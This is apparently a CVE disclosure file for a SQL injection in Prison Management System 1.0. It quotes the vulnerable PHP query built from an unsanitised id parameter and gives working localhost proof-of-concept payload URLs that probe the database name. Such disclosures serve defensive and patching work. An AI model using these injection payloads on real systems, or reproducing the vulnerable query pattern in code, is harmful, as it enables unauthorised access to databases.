Skip to content

Latest commit

 

History

History
24 lines (22 loc) · 1.02 KB

cve-2022-32397.md

File metadata and controls

24 lines (22 loc) · 1.02 KB

CVE-2022-32397

Info

Prison Management System 1.0 - SQL Injection

[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/visits/view_visit.php:4

$qry = $conn->query("SELECT v.*, i.code, concat(i.lastname,', ', i.firstname, coalesce(concat(' ', i.middlename), '')) as `inmate` from `visit_list` v inner join inmate_list i on v.inmate_id = i.id where v.id = '{$_GET['id']}' ");

PoC

  • Payload :
# Error Based
http://localhost/pms/admin/visits/view_visit.php?id=1'/**/-/**/if(database()='pms_db',0,1)%23
  • True : http://localhost/pms/admin/visits/view_visit.php?id=1'/**/-/**/if(database()='pms_db',0,1)%23 True
  • False : http://localhost/pms/admin/visits/view_visit.php?id=1'/**/-/**/if(database()='wrong',0,1)%23 False